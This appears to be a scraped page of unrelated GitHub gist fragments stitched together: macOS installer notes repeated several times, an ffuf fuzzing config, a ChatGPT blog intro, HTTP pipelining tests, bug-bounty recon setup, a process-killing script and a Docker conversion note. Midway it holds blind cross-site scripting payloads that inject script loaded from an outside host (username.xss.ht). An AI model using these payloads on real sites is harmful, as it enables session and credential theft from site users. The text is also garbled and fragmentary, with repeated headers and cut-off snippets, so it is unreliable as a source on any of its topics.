How to create a bootable installer for macOS
Convert mac-os-el-capitan-pkg-to-iso.sh
from using hdiutil
and asr
to using Linux utilities.
[{ | |
"command":"/home/op/go/bin/ffuf -w input -rate 8 -of csv -o _output_/_cleantarget_ -ac -u ", | |
"ext":"csv", | |
"threads":"10" | |
}] | |
How to create a bootable installer for macOS
Convert mac-os-el-capitan-pkg-to-iso.sh
from using hdiutil
and asr
to using Linux utilities.
Convert mac-os-el-capitan-pkg-to-iso.sh
from using hdiutil
and asr
to using Linux utilities.
Important: You will need about 30GB of free disk space.
ChatGPT appeared like an explosion on all my social media timelines in early December 2022. While I keep up with machine learning as an industry, I wasn't focused so much on this particular corner, and all the screenshots seemed like they came out of nowhere. What was this model? How did the chat prompting work? What was the context of OpenAI doing this work and collecting my prompts for training data?
I decided to do a quick investigation. Here's all the information I've found so far. I'm aggregating and synthesizing it as I go, so it's currently changing pretty frequently.
# http://aaronhawley.livejournal.com/12621.html | |
(echo -en "GET / HTTP/1.1\nHost: fropl.com\n\nGET / HTTP/1.1\nHost: fropl.com\n\n"; sleep 0.1) | telnet localhost 80 | |
# Also: | |
perl -e '$| = 1; print "GET / HTTP/1.1\nHost: fropl.com\n\nGET / HTTP/1.1\nHost: fropl.com\n\n"; sleep (1)' | telnet localhost 80 | |
# Also (from https://github.com/ellzey/libevhtp/issues/86#issuecomment-19137572): | |
(echo -en "GET /1 HTTP/1.1\r\n\r\nGET /2 HTTP/1.1\r\n\r\n"; sleep 0.1) | nc localhost 8081 |
"><script src=https://username.xss.ht></script> | |
'><script src=https://username.xss.ht></script> | |
";eval('var a=document.createElement(\'script\');a.src=\'https://username.xss.ht\';document.body.appendChild(a)') |
#!/usr/bin/env bash | |
# | |
# Requirements | |
# - Golang (for complete bug bounty tools, clone this https://github.com/x1mdev/ReconPi) | |
# - gau (go get -u github.com/lc/gau) | |
# - gf (go get -u github.com/tomnomnom/gf) | |
# - Gf-Patterns (https://github.com/1ndianl33t/Gf-Patterns) - Read the README.md for how to copy json file to ~/.gf/ | |
cd ~/.gf | |
ls *.json > ~/patterns |
// 1. Navigate to your Activity Log | |
// 2. Paste this into the JavaScript Console | |
function clickDelete() { | |
document.querySelectorAll('[aria-label="Move to Trash"]')[0].click() | |
} | |
function clickMenu() { | |
document.querySelectorAll('[role="menuitem"]')[2].click(); | |
setTimeout(clickDelete, 250); | |
} |
#!/bin/bash | |
# Task Killer | |
# Helps you to kill unnecessary tasks running on linux and ubuntu. | |
echo -e "$1 - Killing task..." | |
totaltask=$(ps aux | grep "$1" | sed '/grep/d' | wc -l) | |
echo -e "Total $totaltask tasks found" | |
sleep 3s | |
ps aux | grep "$1" | sed '/grep/d' | awk '{print $2}' | while read -r line; do kill $line; done &> /dev/null | |
exit 1 |
Docker image to Virtualbox disk
https://stackoverflow.com/questions/23436613/how-can-i-convert-a-docker-image-into-a-vagrant-virtualbox-box by user blueskin (CC by-sa 3.0)
Find the size of the docker image from docker images
REPOSITORY TAG IMAGE ID CREATED SIZE